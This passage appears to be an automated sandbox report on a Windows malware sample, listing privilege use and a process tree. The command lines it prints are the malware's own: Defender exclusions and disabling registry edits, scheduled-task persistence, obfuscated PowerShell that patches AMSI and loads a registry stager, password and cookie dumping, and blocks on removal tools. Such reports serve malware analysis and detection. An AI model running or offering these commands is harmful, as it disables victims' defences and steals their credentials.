| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\System32\mousocoreworker.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe"
C:\Users\$77main1.exe
"C:\Users\$77main1.exe" 0
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D8C.tmp\7D8D.tmp\7D8E.bat C:\Users\$77main1.exe 0"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force
C:\Users\$77Redownloader.exe
"C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f
C:\Windows\system32\timeout.exe
timeout 10
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f
C:\Windows\system32\timeout.exe
timeout 10
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 3d7545f5200a47d233b3f2f8f659efad WVQAETX4RU+OCJDHATFoIA.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"
C:\Windows\system32\timeout.exe
timeout 20
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WanTajdusvCi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YbAhvEdfwiywiX,[Parameter(Position=1)][Type]$XAGLRCYBxk)$aUEeznrsWJp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$aUEeznrsWJp.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');$aUEeznrsWJp.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$XAGLRCYBxk,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');Write-Output $aUEeznrsWJp.CreateType();}$vfvBfeSrphbGm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rhAIJHZXwnCuUb=$vfvBfeSrphbGm.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tOkucufcqJuEeHBOXif=WanTajdusvCi @([String])([IntPtr]);$sBxwAOIYsTUghGSQmOhzBI=WanTajdusvCi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rbFjmeZKjzf=$vfvBfeSrphbGm.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ZMaZtRoFFGmQJZ=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Load'+'LibraryA')));$NDNmMGzHCxnxcqqmU=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Vir'+'tual'+'Pro'+'tect')));$smSFNae=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMaZtRoFFGmQJZ,$tOkucufcqJuEeHBOXif).Invoke('a'+'m'+'si.dll');$RJWkHcQIUZqPNUrix=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$smSFNae,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WhhbfUqHtK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,4,[ref]$WhhbfUqHtK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RJWkHcQIUZqPNUrix,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,0x20,[ref]$WhhbfUqHtK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LPpCafCnPhGW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rbwbyRJwDfjMMc,[Parameter(Position=1)][Type]$BhvZKaLGRD)$mvwfdZfGBQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$mvwfdZfGBQc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');$mvwfdZfGBQc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$BhvZKaLGRD,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');Write-Output $mvwfdZfGBQc.CreateType();}$CxKhFyPBjiDDB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$CdjVPztmwZThlQ=$CxKhFyPBjiDDB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PgQSsNxxivDMKKUvVcQ=LPpCafCnPhGW @([String])([IntPtr]);$VVrxkLvpZIlYISqOIcGKFw=LPpCafCnPhGW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aEaENWQeyqy=$CxKhFyPBjiDDB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ptJYyEEyVqFZiM=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Load'+'LibraryA')));$bHkrZewmoHwTPxthi=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Vir'+'tual'+'Pro'+'tect')));$GYnbwZW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptJYyEEyVqFZiM,$PgQSsNxxivDMKKUvVcQ).Invoke('a'+'m'+'si.dll');$cvXEVGvFkffjFmvEu=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$GYnbwZW,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BNQEsTfAgW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,4,[ref]$BNQEsTfAgW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXEVGvFkffjFmvEu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,0x20,[ref]$BNQEsTfAgW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{877d7f65-92aa-4771-b2cf-8fde54bedb2c}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e6194327-a952-4558-90c8-ce6936860160}
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\reagentc.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\reagent.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q
C:\Windows\system32\taskkill.exe
taskkill /im "SecurityHealthSystray.exe" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f
C:\Windows\system32\reg.exe
